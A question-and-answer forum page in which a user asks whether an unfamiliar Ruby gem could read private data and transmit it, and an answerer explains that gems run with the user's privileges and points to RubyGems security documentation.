Sign Up to our social questions and Answers Engine to ask questions, answer people’s questions, and connect with other people.
Login to our social questions & Answers Engine to ask questions answer people’s questions & connect with other people.
Lost your password? Please enter your email address. You will receive a link and will create a new password via email.
Please briefly explain why you feel this question should be reported.
Please briefly explain why you feel this answer should be reported.
Please briefly explain why you feel this user should be reported.
I was just about to install a Ruby gem by someone I hadn’t heard of. But something made me think “Who is this guy?”. Is there any risk of a Ruby gem accessing private data on your machine and transmitting it elsewhere – since the gem system has Internet access? Or are there protections against this?
Of course there is. You’re installing software on your computer that runs with the privileges of the script/user that calls it. It’s probably easier to spot malicious code in pure Ruby than in binary packages. But if you think source inspection is a guaranteed way to spot malicious code, check out the under-handed C contest.
That said, if you want to write malware there are more effective delivery systems than Ruby gems. I would not be surprised if the number of actual malicious gems in existence is 0, and thus that the probability that this one is malicious is likewise 0…
See: http://rubygems.org/read/chapter/14#page61